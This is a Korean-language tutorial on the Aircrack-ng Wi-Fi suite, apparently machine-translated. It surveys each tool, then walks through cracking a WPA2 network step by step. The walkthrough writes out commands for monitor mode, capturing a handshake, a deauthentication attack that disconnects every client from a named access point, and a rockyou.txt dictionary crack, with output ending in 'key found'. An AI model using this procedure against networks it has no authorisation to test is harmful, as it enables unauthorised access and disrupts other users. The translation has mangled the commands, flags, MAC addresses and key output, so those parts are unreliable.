Aircrack-ng WiFi 네트워크 보안을 테스트하도록 설계된 소프트웨어의 전체 세트입니다. 단일 도구가 아니라 각각 특정 목적을 수행하는 도구 모음입니다. 액세스 포인트 모니터링, 테스트, 네트워크 공격, Wi-Fi 네트워크 크래킹 및 테스트와 같은 다양한 Wi-Fi 보안 영역을 작업할 수 있습니다. Aircrack의 주요 목표는 패킷을 가로채고 해시를 해독하여 암호를 해독하는 것입니다. 거의 모든 새로운 무선 인터페이스를 지원합니다. Aircrack-ng 구식 도구 모음 Aircrack의 개선된 버전입니다. ng는 새로운 세대 . 더 큰 작업을 수행하는 데 함께 작동하는 멋진 도구 중 일부입니다.
에어몬:
Airmon-ng는 네트워크 인터페이스 카드를 모니터 모드로 설정하는 aircrack-ng 키트에 포함되어 있습니다. 네트워크 카드는 일반적으로 NIC의 MAC 주소에 정의된 대로 자신을 대상으로 하는 패킷만 수락하지만 airmon-ng를 사용하면 대상이든 아니든 모든 무선 패킷도 수락됩니다. 액세스 포인트에 연결하거나 인증하지 않고도 이러한 패킷을 잡을 수 있어야 합니다. 네트워크 인터페이스를 모니터 모드로 전환하여 액세스 포인트의 상태를 확인하는 데 사용됩니다. 먼저 모니터 모드를 켜도록 무선 카드를 구성한 다음 방해하는 프로세스가 있다고 생각되면 모든 백그라운드 프로세스를 종료해야 합니다. 프로세스를 종료한 후 아래 명령을 실행하여 무선 인터페이스에서 모니터 모드를 활성화할 수 있습니다.
[이메일 보호] :~$수도airmon-ng 시작 wlan0#
아래 명령을 사용하여 언제든지 airmon-ng를 중지하여 모니터 모드를 비활성화할 수도 있습니다.
[이메일 보호] :~$수도airmon-ng 중지 wlan0#에어로 덤프:
Airodump-ng는 우리 주변의 모든 네트워크를 나열하고 이에 대한 귀중한 정보를 보는 데 사용됩니다. airodump-ng의 기본 기능은 패킷을 스니핑하는 것이므로 기본적으로 모니터 모드에 있는 동안 우리 주변의 모든 패킷을 잡도록 프로그래밍되어 있습니다. 우리 주변의 모든 연결에 대해 실행하고 네트워크에 연결된 클라이언트 수, 해당 MAC 주소, 암호화 스타일 및 채널 이름과 같은 데이터를 수집한 다음 대상 네트워크를 대상으로 시작합니다.
airodump-ng 명령을 입력하고 네트워크 인터페이스 이름을 매개변수로 지정하여 이 도구를 활성화할 수 있습니다. 여기에는 모든 액세스 포인트, 데이터 패킷의 양, 사용된 암호화 및 인증 방법, 네트워크 이름(ESSID)이 나열됩니다. 해킹의 관점에서 보면 mac address가 가장 중요한 필드입니다.
[이메일 보호] :~$수도airodump-ng wlx0mon 
에어크랙:
Aircrack은 암호 크래킹에 사용됩니다. airodump를 사용하여 모든 패킷을 캡처한 후 aircrack으로 키를 크랙할 수 있습니다. PTW 및 FMS의 두 가지 방법을 사용하여 이러한 키를 해독합니다. PTW 접근 방식은 두 단계로 수행됩니다. 처음에는 ARP 패킷만 사용하다가 검색 후 키가 크랙되지 않으면 캡처된 다른 패킷을 모두 사용합니다. PTW 방식의 장점은 모든 패킷이 크래킹에 사용되지 않는다는 것입니다. 두 번째 접근 방식, 즉 FMS에서는 키를 해독하기 위해 통계 모델과 무차별 대입 알고리즘을 모두 사용합니다. 사전 방법을 사용할 수도 있습니다.
에어플레이:
Airplay-ng는 패킷을 무선 네트워크에 도입하여 트래픽을 생성하거나 가속화합니다. 서로 다른 두 소스의 패킷은 aireplay-ng로 캡처할 수 있습니다. 첫 번째는 라이브 네트워크이고 두 번째는 이미 존재하는 pcap 파일의 패킷입니다. Airplay-ng는 무선 액세스 포인트 및 사용자를 대상으로 하는 인증 해제 공격 시 유용합니다. 또한 클라이언트 시스템에서 키를 가져올 수 있는 도구인 airplay-ng를 사용하여 커피 라떼 공격과 같은 일부 공격을 수행할 수 있습니다. ARP 패킷을 포착한 다음 이를 조작하여 시스템으로 다시 전송하면 이를 달성할 수 있습니다. 그런 다음 클라이언트는 airodump에 의해 캡처될 수 있는 패킷을 생성하고 aircrack은 수정된 패킷에서 키를 크래킹합니다. airplay-ng의 다른 공격 옵션에는 chopchop, fragment arepreplay 등이 있습니다.
공군 기지:
Airbase-ng는 침입자의 컴퓨터를 다른 사람이 연결할 수 있는 손상된 연결 지점으로 변환하는 데 사용됩니다. Airbase-ng를 사용하면 합법적인 액세스 포인트라고 주장하고 네트워크에 연결된 컴퓨터에서 메시지 가로채기 공격을 수행할 수 있습니다. 이러한 종류의 공격을 Evil Twin Attack이라고 합니다. 기본 사용자가 합법적인 액세스 포인트와 가짜 액세스 포인트를 구별하는 것은 불가능합니다. 따라서 사악한 쌍둥이 위협은 오늘날 우리가 직면한 가장 위협적인 무선 위협 중 하나입니다.
에어로립-ng:
Airolib는 비밀번호 목록과 액세스 포인트를 저장하고 관리하여 해킹 프로세스의 속도를 높입니다. 이 프로그램에서 사용하는 데이터베이스 관리 시스템은 대부분 모든 플랫폼에서 사용 가능한 SQLite3입니다. 암호 해독에는 개인 임시 키(PTK)가 추출되는 쌍별 마스터 키의 계산이 포함됩니다. PTK를 사용하여 주어진 패킷에 대한 프레임 메시지 식별 코드(MIC)를 결정하고 이론적으로 MIC가 패킷과 유사함을 찾을 수 있으므로 PTK가 옳았다면 PMK도 옳았습니다.
데이터베이스에 저장된 암호 목록 및 액세스 네트워크를 보려면 다음 명령을 입력하십시오.
[이메일 보호] :~$수도airlib-ng testdatabase – 통계여기서 testdatabase는 액세스하거나 생성하려는 db이고 –stats는 수행하려는 작업입니다. 일부 SSID 또는 무언가에 최대 우선 순위를 부여하는 것과 같이 데이터베이스 필드에서 여러 작업을 수행할 수 있습니다. aircrack-ng와 함께 airolib-ng를 사용하려면 다음 명령을 입력하십시오.
[이메일 보호] :~$수도aircrack-ng-NS테스트 데이터베이스 wpa2.eapol.cap여기에서 이미 계산된 PMK를 사용하고 있습니다. 테스트 데이터베이스 암호 크래킹 프로세스의 속도를 높이기 위해.
Aircrack-ng를 사용하여 WPA/WPA2 크래킹:
aircrack-ng가 몇 가지 멋진 도구의 도움으로 무엇을 할 수 있는지에 대한 작은 예를 살펴보겠습니다. 사전 방법을 사용하여 WPA/WPA2 네트워크의 사전 공유 키를 해독합니다.
가장 먼저 해야 할 일은 모니터 모드를 지원하는 네트워크 인터페이스를 나열하는 것입니다. 이것은 다음 명령을 사용하여 수행할 수 있습니다.
[이메일 보호] :~$수도에어몬PHY 인터페이스 드라이버 칩셋
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.
인터페이스를 볼 수 있습니다. 이제 다음 명령을 사용하여 찾은 네트워크 인터페이스( wlx0 )를 모니터 모드로 설정해야 합니다.
[이메일 보호] :~$수도airmon-ng 시작 wlx0 
인터페이스에서 모니터 모드를 활성화했습니다. wlx0mon .
이제 모니터 모드로 설정한 네트워크 인터페이스를 통해 근처 라우터의 브로드캐스트 수신을 시작해야 합니다.
[이메일 보호] :~$수도airodump-ng wlx0mon채널5 ][경과:30NS][ 2020년-12-02 00:17
BSSID PWR 비콘#데이터, #/s CH MB ENC 암호 인증 ESSID
E4: 6층:13: 04: CE:31 -오분의 사 62 27 0 154e WPA2 CCMP PSK 크랙잇
C4:E9:84:76:10:이다-63 77 0 0 654e. WPA2 CCMP PSK 해킹
C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07
74:제공:88:파:38: 02-68 28 2 0 열하나54e WPA2 CCMP PSK TP-Link_3802
BSSID 스테이션 PWR 비율 손실 프레임 프로브
E4: 6층:13: 04: CE:315C:3A:오분의 사: D7: EA: 8B -삼 0- 1e8 5
E4: 6층:13: 04: CE:31C4:67:D3:C2:CD:D7 -331e-6e0 삼
E4: 6층:13: 04: CE:315C:C3:07:56:61: 에프 -35 0-1 0 6
E4: 6층:13: 04: CE:31기원전:91:B5:F8:7E:D5 -390e-1 1002 13
우리의 목표 네트워크는 크랙킷 이 경우 현재 채널 1에서 실행되고 있습니다.
여기에서 대상 네트워크의 암호를 해독하기 위해 장치가 네트워크에 연결을 시도할 때 발생하는 4방향 핸드셰이크를 캡처해야 합니다. 다음 명령을 사용하여 캡처할 수 있습니다.
[이메일 보호] :~$수도에어로덤프-ng-씨 1--bssid E4: 6F:13: 04: CE:31 -에 /홈 wlx0-씨 : 채널
-Bss : 대상 네트워크의 Bssid
-에 : pcap 파일이 위치할 디렉토리 이름
이제 장치가 네트워크에 연결될 때까지 기다려야 하지만 핸드셰이크를 캡처하는 더 좋은 방법이 있습니다. 다음 명령을 사용하여 인증 해제 공격을 사용하여 AP에 대한 장치 인증을 해제할 수 있습니다.
[이메일 보호] :~$수도에어플레이-ng-0 -에게E4: 6층:13: 04: CE:31에게 : 대상 네트워크의 Bssid
-0 : 비인증 공격
모든 장치의 연결을 끊었으므로 이제 장치가 네트워크에 연결될 때까지 기다려야 합니다.
채널1 ][경과:30NS][ 2020년-12-02 00:02][WPA 핸드셰이크: E4: 6F:13: 04: CE:31BSSID PWR RXQ 비콘#데이터, #/s CH MB ENC CIPHER AUTH E
E4: 6층:13: 04: CE:31 -47 1 228 807 36 154번째 WPA2 CCMP PSK P
BSSID 스테이션 PWR 비율 손실 프레임 프로브
E4: 6층:13: 04: CE:31기원전:91:B5:F8:7E:D5 -35 0-1 0 1
E4: 6층:13: 04: CE:315C:3A:오분의 사: D7: EA: 8B -290e-1e0 22
E4: 6층:13: 04: CE:31 88:28: B3:30:27:7E -310e-1 0 32
E4: 6층:13: 04: CE:31C4:67:D3:C2:CD:D7 -350e- 6e263 708크랙잇
E4: 6층:13: 04: CE:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86
E4: 6층:13: 04: CE:315C:C3:07:56:61: 에프 -37 0- 1e0 1
우리는 히트했고 시간 바로 옆의 오른쪽 상단을 보면 악수를 캡처한 것을 볼 수 있습니다. 이제 지정된 폴더( /집 우리의 경우) .pcap 파일.
WPA 키를 해독하기 위해 다음 명령을 사용할 수 있습니다.
[이메일 보호] :~$수도aircrack-ng-a2 -에rockyou.txt-NSE4: 6층:13: 04: CE:31악수.캡b : 대상 네트워크의 Bssid
-a2 : WPA2 모드
Rockyou.txt: 사전파일사용 된
Handshake.cap: The파일 어느캡처된 악수 포함
Aircrack-ng1.2베타3
[00:01:49] 10566테스트된 키(1017.96에게/NS)
열쇠 발견! [요거미]
마스터 키 : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6F오십씨
과도 키 : 4D C4 5R 6T76 996G 7H 8D EC
H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B
A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089
8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B
MAC: CB 5A F8 CE62지하2 1B F7 6F오십C025 62E9 5D71
대상 네트워크의 키가 성공적으로 크랙되었습니다.
결론:
무선 네트워크는 스마트폰을 사용하는 작업자부터 산업용 제어 장치에 이르기까지 모든 회사에서 사용하는 모든 곳에 있습니다. 연구에 따르면 2021년에는 인터넷 트래픽의 거의 50% 이상이 WiFi를 통해 이루어질 것입니다. 무선 네트워크에는 많은 장점이 있습니다. 외부 통신, 유선 연결이 거의 불가능한 장소에서 빠른 인터넷 액세스, 케이블 설치 없이 네트워크 확장 가능 다른 사용자를 위해 모바일 장치를 집에 없을 때 홈 오피스에 쉽게 연결할 수 있습니다.
이러한 장점에도 불구하고 개인 정보 및 보안에 대한 큰 물음표가 있습니다. 이러한 네트워크로; 라우터의 전송 범위 내에서 모든 사람에게 열려 있고 쉽게 공격받을 수 있으며 데이터가 쉽게 손상될 수 있습니다. 예를 들어, 일부 공용 Wi-Fi에 연결되어 있으면 해당 네트워크에 연결된 모든 사람이 일부 인텔리전스와 사용 가능한 멋진 도구의 도움을 받아 네트워크 트래픽을 쉽게 확인하고 덤프할 수 있습니다.